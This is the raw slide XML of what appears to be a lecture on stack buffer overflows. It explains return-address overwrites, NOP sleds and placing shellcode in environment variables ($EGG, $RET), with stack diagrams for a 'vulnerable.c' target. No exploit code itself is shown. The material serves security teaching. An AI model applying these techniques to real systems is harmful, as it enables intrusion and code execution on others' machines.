              <a:rPr lang="en-HK" altLang="zh-TW" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execution stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t> to store the information about the active functions in the program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>One important information stored in the execution stack is the address of the next instruction to be executed when the function terminates.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A1717F91-11C2-4B0E-9047-305109642ECB}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7772400" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>It is very difficult for exploit2 to success</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>The problem is that we need to guess exactly where the address of our shellcode will start.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>To increase our chance:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="990600" lvl="1" indent="-533400" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Pad the front of our overflow buffer with NOP instructions (i.e., no operations).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="990600" lvl="1" indent="-533400" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Fill half of the buffer with NOP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="990600" lvl="1" indent="-533400" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Place the shellcode in the middle.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="990600" lvl="1" indent="-533400" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Then fill the addresses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>If the return address points anywhere in the string of NOPs, the NOP instructions will be executed, until the shellcode is reached.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6065F8D1-9108-4282-8683-ADB2762E9F55}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47106" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="228600"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>Exploit3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="20484" name="Object 3">
            <a:hlinkClick r:id="" action="ppaction://ole?verb=1"/>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110804112"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="684213" y="2924175"/>
          <a:ext cx="2952750" cy="2306638"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s20546" name="Wordpad Document" showAsIcon="1" r:id="rId4" imgW="914400" imgH="714375" progId="WordPad.Document.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Wordpad Document" showAsIcon="1" r:id="rId4" imgW="914400" imgH="714375" progId="WordPad.Document.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2924175"/>
                        <a:ext cx="2952750" cy="2306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5" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="2355850"/>
            <a:ext cx="1368425" cy="2668588"/>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Overflowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20486" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="5026025"/>
            <a:ext cx="1368425" cy="431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sfp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20487" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="5457825"/>
            <a:ext cx="1368425" cy="4318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ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20488" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257800" y="4953000"/>
            <a:ext cx="1008063" cy="43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addr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20489" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257800" y="5384800"/>
            <a:ext cx="1008063" cy="43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addr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20490" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257800" y="4162425"/>
            <a:ext cx="1008063" cy="7905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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20491" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257800" y="2359025"/>
            <a:ext cx="1008063" cy="180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NOPs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20492" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5473700" y="1976438"/>
            <a:ext cx="742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1800">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$EGG</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20493" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="6265863" y="5568950"/>
            <a:ext cx="2889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4" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6554788" y="3048000"/>
            <a:ext cx="0" cy="25193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5" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6267450" y="3048000"/>
            <a:ext cx="288925"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0496" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4248150" y="6000750"/>
            <a:ext cx="865188"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50000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Higher memory address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20497" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4191000" y="1343025"/>
            <a:ext cx="865188"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50000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Lower memory address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258886" y="1469871"/>
            <a:ext cx="2362200" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-HK" dirty="0"/>
              <a:t>Stack diagram for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" dirty="0" err="1"/>
              <a:t>vulnerable.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Arrow Connector 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3392486" y="2300868"/>
            <a:ext cx="384178" cy="38417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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="1059426"/>
            <a:ext cx="2362200" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-HK" dirty="0"/>
              <a:t>Generated by exploit3.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6365080" y="2030703"/>
            <a:ext cx="538163" cy="3940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6819898" y="4256625"/>
            <a:ext cx="2209800" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-HK" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" sz="2000" dirty="0"/>
              <a:t> tries to point to any NOP (much easier compare with exploit2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Arrow Connector 22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6623050" y="4449365"/>
            <a:ext cx="214311" cy="21669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479E6A36-D0C5-43E8-B669-704AE6CADE6C}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="609600"/>
            <a:ext cx="7772400" cy="5867400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>What if the buffer is too small for the shellcode to fit into it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>The size of our shellcode is around 50 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Suppose the size of the buffer in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>vulnerable.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> is now 30 instead of 512</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Even if we do not pad NOP, part of the shellcode is already overwriting ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Put the shellcode in another place.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Use two environment variables:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>One contains the shellcode.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>Another contains the addresses trying to point to the shellcode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293CE25B-C119-4DD7-AA20-5E65D8654EEF}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48130" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>Exploit4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22532" name="Group 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="1748631"/>
            <a:ext cx="4249737" cy="4833937"/>
            <a:chOff x="2835" y="1111"/>
            <a:chExt cx="2677" cy="3045"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22534" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5013" y="1925"/>
              <a:ext cx="499" cy="952"/>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NOPs</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22535" name="Rectangle 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5013" y="2878"/>
              <a:ext cx="499" cy="499"/>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shell</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1800">
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>code</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22536" name="Line 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipH="1" flipV="1">
              <a:off x="4287" y="1972"/>
              <a:ext cx="726" cy="22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37" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5020" y="1655"/>
              <a:ext cx="4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1800">
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>$EGG</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22538" name="Rectangle 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2835" y="1706"/>
              <a:ext cx="862" cy="1361"/>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Overflowed</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1800">
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>buffer</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22539" name="Rectangle 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2835" y="3068"/>
              <a:ext cx="862" cy="272"/>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sfp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22540" name="Rectangle 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2835" y="3340"/>
              <a:ext cx="862" cy="272"/>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ret</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22541" name="Text Box 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3743" y="1337"/>
              <a:ext cx="4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1800">
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>$RET</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22542" name="Text Box 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3015" y="3696"/>
              <a:ext cx="545"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50000"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1400">
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Higher memory address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22543" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3014" y="1111"/>
              <a:ext cx="545"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50000"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1400">
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Lower memory address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22544" name="Rectangle 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3652" y="1837"/>
              <a:ext cx="635" cy="2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addr</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22545" name="Rectangle 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3652" y="2109"/>
              <a:ext cx="635" cy="31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addr</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22546" name="Rectangle 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3652" y="2427"/>
              <a:ext cx="635" cy="2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addr</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22547" name="Rectangle 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3652" y="2699"/>
              <a:ext cx="635" cy="2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addr</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22548" name="Rectangle 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
